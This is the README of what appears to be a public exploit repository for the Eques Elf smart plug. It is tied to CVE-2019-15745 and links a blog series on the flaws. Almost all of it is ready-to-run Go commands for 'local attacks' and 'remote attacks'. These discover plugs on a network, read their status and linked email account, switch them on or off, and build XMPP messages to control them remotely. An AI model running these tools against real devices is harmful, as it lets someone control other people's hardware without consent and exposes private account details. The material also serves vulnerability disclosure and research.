/eques

Exploit code/scripts for the eques elf smart plugs

Primary LanguageGo

This repo contains exploit code/scripts for the eques elf smart plugs - https://equeshome.com/products/elf-smart-plug.

Full details can be found in the following four part series - https://www.ckn.io/blog/2019/08/27/exploiting-the-eques-elf-smart-plug-part-one/

The vulnerabilities have been allocated CVE-2019-15745 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15745

Local attacks

To discover all smart plugs in a network:

go run equeslocal.go --command=discover

To check the status of a smart plug:

go run equeslocal.go --mac=<mac address of the plug> --pass=<password/name of the plug> --ip=<IP address of the plug> --command=status

To turn on a smart plug:

go run equeslocal.go --mac=<mac address of the plug> --pass=<password/name of the plug> --ip=<IP address of the plug> --command=on

To turn off a smart plug:

go run equeslocal.go --mac=<mac address of the plug> --pass=<password/name of the plug> --ip=<IP address of the plug> --command=off

Remote attacks

To check the software and hardware version of a smart plug

go run equescommand.go --mac=<mac address of the plug> --command=version

To check the status of a smart plug

go run equescommand.go --mac=<mac address of the plug> --command=status

To get the email account linked to a smart plug

go run equescommand.go --mac=<mac address of the plug> --command=auth

To check if a timer is set on a smart plug

go run equescommand.go --mac=<mac address of the plug> --command=timer

To generate the message to turn the plug on over xmpp. The message can then be sent to "devicemac"@ikonkek2.com.

go run equesxmpp.go --devicemac=<mac address of the plug> --pass=<password/name of the plug> --command=on

To generate the message to turn the plug off over xmpp. The message can then be sent to "devicemac"@ikonkek2.com.

go run equesxmpp.go --devicemac=<mac address of the plug> --pass=<password/name of the plug> --command=off